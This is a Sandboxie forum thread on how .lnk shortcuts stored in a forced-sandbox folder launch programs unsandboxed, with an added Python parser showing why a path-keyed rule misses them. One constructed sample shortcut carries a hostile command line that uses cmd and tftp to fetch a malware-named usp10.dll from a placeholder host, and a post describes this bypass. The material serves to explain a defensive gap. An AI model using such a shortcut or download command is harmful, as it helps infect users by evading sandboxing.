Can you add .lnk file to force folder?

Ideas for enhancements to the software
Mature
Posts: 66
Joined: Wed Jun 10, 2009 4:18 pm
Location: china

Post by Mature » Fri Apr 02, 2010 9:06 am

Hi Tzuk,

A few minutes ago a guy asked me if sbie could prevent the lnk virus.

For example, create an .lnk file pointing to c:\windows\regedit.exe on drive D, then force drive D to run sandboxed, and run the .lnk file to see if regedit.exe runs sandboxed.

I tested it as he described; the result: regedit.exe runs unsandboxed.

I know there are several kinds of files that sbie won't force to run sandboxed, maybe because Tzuk thought these suffixes are not very dangerous; however, the guy told me that he could create an .lnk file with a command to run tftp.exe (or cmd.exe, or something else) to download an infected usp10.dll (it's a famous virus), and the system would be infected on the next boot...

Well... he said this is just a simple example... this is a vulnerability and could be fatal.

In a word... we all wish sbie could get better and better~

ssj100
Posts: 945
Joined: Thu Apr 23, 2009 1:21 am

Post by ssj100 » Sat Apr 03, 2010 2:09 am

Not surprising at all. I'm sure there are hundreds of ways to bypass the force run sandboxed command. However, in my opinion, that isn't the primary purpose of Sandboxie. The primary purpose is of course to prevent anything that is already in the sandbox from breaking out of the sandboxed environment.

EDIT: I recall now that with media and picture files, if Windows Media Player and Windows Picture and Fax Viewer are your default programs for running these file types respectively, running these files from a force sandboxed folder/drive will not work - they will always open unsandboxed, and there's no workaround for this. Solution? Simply always open them in a sandboxed explorer.exe environment instead, or you can always right click the file and manually run it sandboxed.
Sandboxie + SUA + DEP
Windows Firewall + NAT Router
Drive SnapShot (on-demand)

Mature
Posts: 66
Joined: Wed Jun 10, 2009 4:18 pm
Location: china

Post by Mature » Sat Apr 03, 2010 4:45 am

ssj100 wrote:Not surprising at all. I'm sure there are hundreds of ways to bypass the force run sandboxed command. However, in my opinion, that isn't the primary purpose of Sandboxie. The primary purpose is of course to prevent anything that is already in the sandbox from breaking out of the sandboxed environment.

EDIT: I recall now that with media and picture files, if Windows Media Player and Windows Picture and Fax Viewer are your default programs for running these file types respectively, running these files from a force sandboxed folder/drive will not work - they will always open unsandboxed, and there's no workaround for this. Solution? Simply always open them in a sandboxed explorer.exe environment instead, or you can always right click the file and manually run it sandboxed.
But there is a vulnerability... an lnk virus just tricks you into double-clicking the lnk file, and there you go, you get infected...

It's not secure to run things in the sandbox; what do you think about that?

tzuk
Sandboxie Founder
Posts: 16076
Joined: Tue Jun 22, 2004 12:57 pm

Post by tzuk » Sat Apr 03, 2010 5:18 am

Variations on this have been discussed here several times. The forced folder feature has some limitations, in that it only comes into play when an EXE file runs. It does not know about the document file (PDF, LNK, TXT, whatever). In this case, your LNK says to run an EXE from drive C, so the forced folder feature does not apply.
tzuk
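To make tzuk's point concrete, here is an added example (my code, not Sandboxie's): a small Python parser for the Shell Link format (MS-SHLLINK) that pulls the launched target path and command-line arguments out of a .lnk, plus a path-prefix check standing in for a forced-folder rule keyed on the EXE's path. The sample shortcuts are constructed inside the script, the tftp command line and the 192.0.2.10 address are placeholders, "D:\" as the forced folder follows the thread, and the prefix check is a simplification of Sandboxie's real rule handling.

```python
"""Inspect a Windows .lnk (Shell Link) and decide what a path-keyed
forced-folder rule would see when the shortcut is opened.

Added example; not Sandboxie's code. Field layout follows MS-SHLLINK. Only
the pieces needed here are parsed: the 76-byte header, LinkInfo (local base
path + common path suffix) and the StringData command-line arguments.
"""
import struct
from pathlib import PureWindowsPath

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80


def _cstr(buf, off, unicode=False):
    """Read a NUL-terminated string at `off` (UTF-16LE if `unicode`, else ANSI)."""
    if unicode:
        end = off
        while end + 1 < len(buf) and buf[end:end + 2] != b"\x00\x00":
            end += 2
        return buf[off:end].decode("utf-16-le")
    return buf[off:buf.index(b"\x00", off)].decode("cp1252")


def parse_lnk(data):
    """Return the launched target path (from LinkInfo) and selected StringData."""
    hdr_size, clsid = struct.unpack_from("<I16s", data, 0)
    if hdr_size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    off = 0x4C
    if flags & HAS_IDLIST:                      # skip the ItemIDList entirely
        off += 2 + struct.unpack_from("<H", data, off)[0]
    target = None
    if flags & HAS_LINKINFO:
        li = off
        li_size, li_hdr, li_flags = struct.unpack_from("<III", data, li)
        if li_flags & 0x1:                      # VolumeIDAndLocalBasePath present
            uni = li_hdr >= 0x24                # header long enough for Unicode offsets
            base_off, suffix_off = (struct.unpack_from("<II", data, li + 28) if uni
                                    else (struct.unpack_from("<I", data, li + 16)[0],
                                          struct.unpack_from("<I", data, li + 24)[0]))
            target = _cstr(data, li + base_off, uni) + _cstr(data, li + suffix_off, uni)
        off += li_size
    strings, width = {}, (2 if flags & IS_UNICODE else 1)   # uint16 count, then chars
    for bit, name in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                      (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "args"), (HAS_ICON, "icon")):
        if flags & bit:
            n = struct.unpack_from("<H", data, off)[0] * width
            strings[name] = data[off + 2:off + 2 + n].decode("utf-16-le" if width == 2 else "cp1252")
            off += 2 + n
    return {"target": target, "args": strings.get("args"),
            "relative_path": strings.get("relative_path")}


def is_under(path, root):
    """True if `path` is `root` or lies below it (case-insensitive, Windows semantics)."""
    p, r = PureWindowsPath(path).parts, PureWindowsPath(root).parts
    return [s.lower() for s in p[:len(r)]] == [s.lower() for s in r]


def forced_decision(lnk_bytes, forced_roots):
    """What a path-keyed forced-folder rule sees: the EXE the link launches.
    Where the .lnk itself sits plays no part. Returns (target, forced)."""
    target = parse_lnk(lnk_bytes)["target"]
    if target is None:
        return None, None
    return target, any(is_under(target, root) for root in forced_roots)


def build_lnk(target, args=None):
    """Constructed sample: minimal .lnk with a LinkInfo local path and optional
    ANSI command-line arguments (IsUnicode clear). Volume fields are dummies."""
    flags = HAS_LINKINFO | (HAS_ARGS if args is not None else 0)
    header = struct.pack("<I16sIIQQQIIIH2xII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0)
    vol = struct.pack("<IIII", 17, 3, 0, 0x10) + b"\x00"    # VolumeID, empty label
    base = target.encode("cp1252") + b"\x00"
    base_off = 28 + len(vol)
    suffix_off = base_off + len(base)
    linkinfo = struct.pack("<IIIIIII", suffix_off + 1, 28, 0x1, 28, base_off, 0, suffix_off)
    body = header + linkinfo + vol + base + b"\x00"          # empty CommonPathSuffix
    if args is not None:
        a = args.encode("cp1252")
        body += struct.pack("<H", len(a)) + a
    return body


if __name__ == "__main__":
    forced = ["D:\\"]                                         # drive D forced, as in the thread
    samples = (("regedit shortcut stored on D:", build_lnk(r"C:\Windows\regedit.exe")),
               ("cmd/tftp shortcut stored on D:", build_lnk(r"C:\Windows\System32\cmd.exe",
                                                            args="/c tftp.exe -i 192.0.2.10 GET usp10.dll")),
               ("EXE actually stored on D:", build_lnk(r"D:\Downloads\setup.exe")))
    for label, lnk in samples:
        target, is_forced = forced_decision(lnk, forced)
        print(f"{label:31} launches {target!r}  forced={is_forced}  args={parse_lnk(lnk)['args']!r}")
```

Run it and the first two shortcuts resolve to EXEs on C:, so a rule keyed on the EXE path says "not forced" even though the .lnk lives on the forced drive; only the third, whose target really is under D:\, comes back forced. The parser also surfaces the arguments, which is where a cmd.exe or tftp.exe shortcut carries its real payload and which a per-EXE path rule never looks at.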

ssj100
Posts: 945
Joined: Thu Apr 23, 2009 1:21 am

Post by ssj100 » Sat Apr 03, 2010 5:28 am

tzuk wrote:Variations on this have been discussed here several times. The forced folder feature has some limitations, in that it only comes into play when an EXE file runs. It does not know about the document file (PDF, LNK, TXT, whatever). In this case, your LNK says to run an EXE from drive C, so the forced folder feature does not apply.
That's exactly right (of course). Mature, as I already implied, if you want to have "100%" security, you also need a good "security approach", rather than just rely on your "security setup".

Regardless, it seems you are not quite fully understanding what "running in the sandbox" means. A forced folder only "tries" to run everything in it sandboxed - there's no guarantee it will...not by a long shot.

arran
Posts: 72
Joined: Sun Aug 17, 2008 2:02 am

Post by arran » Sat Apr 03, 2010 5:37 am

ssj100 wrote: Solution? Simply always open them in a sandboxed explorer.exe environment instead, or you can always right click the file and manually run it sandboxed.
Or use 3rd party software to open media and picture files.

ssj100
Posts: 945
Joined: Thu Apr 23, 2009 1:21 am

Post by ssj100 » Sat Apr 03, 2010 6:18 am

arran wrote:
ssj100 wrote: Solution? Simply always open them in a sandboxed explorer.exe environment instead, or you can always right click the file and manually run it sandboxed.
Or use 3rd party software to open media and picture files.
Indeed. However, I always try to minimise the number of third party software I use on my systems.

Also, there's just no guarantee that Sandboxie will always open your file sandboxed if you rely on its force command. Objectively, it's much more secure opening newly introduced files with a sandboxed explorer.exe. Because in doing so, you are using the full power of Sandboxie to "house" the potential malware/exploit, as you are already starting in a sandboxed environment. That is, for the malware to break out, it will need to TRULY bypass Sandboxie.

Mature
Posts: 66
Joined: Wed Jun 10, 2009 4:18 pm
Location: china

Post by Mature » Sat Apr 03, 2010 7:32 am

Well... does this mean force folder can only apply to known apps? Because it is possible to get infected when running a file under a force folder; the guy told me pdf and jpg need a buffer overflow vulnerability to execute code, but lnk just executes directly...

Anyway, I raised this up... whether you fix it is up to you~

ssj100
Posts: 945
Joined: Thu Apr 23, 2009 1:21 am

Post by ssj100 » Sat Apr 03, 2010 7:47 am

Mature wrote:Well... does this mean force folder can only apply to known apps? Because it is possible to get infected when running a file under a force folder; the guy told me pdf and jpg need a buffer overflow vulnerability to execute code, but lnk just executes directly...

Anyway, I raised this up... whether you fix it is up to you~
Exactly. As I said, I'm sure there are many ways to bypass the "force folder" command of Sandboxie (and as I already mentioned, it's already bypassed by default with .jpg and .avi files when using Windows Media Player and Windows Picture and Fax Viewer).

And in general, this isn't really a "fix" to ask for. It's more a "feature" to potentially add if Tzuk can be bothered haha.

Mature
Posts: 66
Joined: Wed Jun 10, 2009 4:18 pm
Location: china

Post by Mature » Sat Apr 03, 2010 9:39 am

ssj100 wrote:
Mature wrote:Well... does this mean force folder can only apply to known apps? Because it is possible to get infected when running a file under a force folder; the guy told me pdf and jpg need a buffer overflow vulnerability to execute code, but lnk just executes directly...

Anyway, I raised this up... whether you fix it is up to you~
Exactly. As I said, I'm sure there are many ways to bypass the "force folder" command of Sandboxie (and as I already mentioned, it's already bypassed by default with .jpg and .avi files when using Windows Media Player and Windows Picture and Fax Viewer).

And in general, this isn't really a "fix" to ask for. It's more a "feature" to potentially add if Tzuk can be bothered haha.
hehe~ I don't think I can bother Tzuk without your support, since the whole WS is bothered by you :lol:
